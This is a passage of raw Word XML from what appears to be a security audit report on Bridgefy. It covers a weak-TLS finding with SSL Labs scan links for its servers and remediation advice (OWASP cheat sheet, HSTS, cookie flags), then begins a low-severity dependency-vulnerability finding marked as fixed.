        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>protocols</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>known</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vulnerabilities:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.0,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> 1.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ciphers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>current</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>URLs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId103">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/analyze.html?d=www.bridgefy.me&amp;hideResults=on</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId104">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/analyze.html?d=bridgefy.me&amp;hideResults=on</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/analyze.html?d=staging.sdk.bridgefy.services&amp;s=18.215.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId105">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>72.71&amp;hideResults=on</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId106">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/analyze.html?d=staging.app.bridgefy.services&amp;s=34.193</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="369"/>
      </w:pPr>
      <w:hyperlink r:id="rId106">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>.139.227&amp;hideResults=on</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId107">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://www.ssllabs.com/ssltest/analyze.html?d=staging.broker.bridgefy.services&amp;s=3.23</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId107">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>5.213.66&amp;hideResults=on&amp;latest</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to deploy TLS correctly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>solve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>these</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>problems,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>done on all servers, including those that were out of scope during this assignment. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>OWASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Cheat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> is a valuable resource to do this. Ultimately, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SSL Labs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="22"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487604736">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>175327</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="53" name="Graphic 53"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="53" name="Graphic 53"/>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3.805323pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15711744;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape40" coordorigin="1440,276" coordsize="2880,0" path="m1440,276l4320,276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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>59</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId108">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/.../Transport_Layer_Protection_Cheat_Sheet.html</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> can be helpful to verify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>website</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>reachable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>online. The goal should be to obtain an A ranking from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Labs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>website.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Alternatively,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>OWASP O-Saft </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>tool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>61</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> may facilitate testing the TLS configuration of servers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>not reachable via the internet. Finally, it is highly encouraged to ensure all web servers implement </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>HSTS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>62</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and that all cookies, especially session cookies, have the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>63</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>flags enabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250035" w:id="20"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3/5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Inherited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Dependencies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was established</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
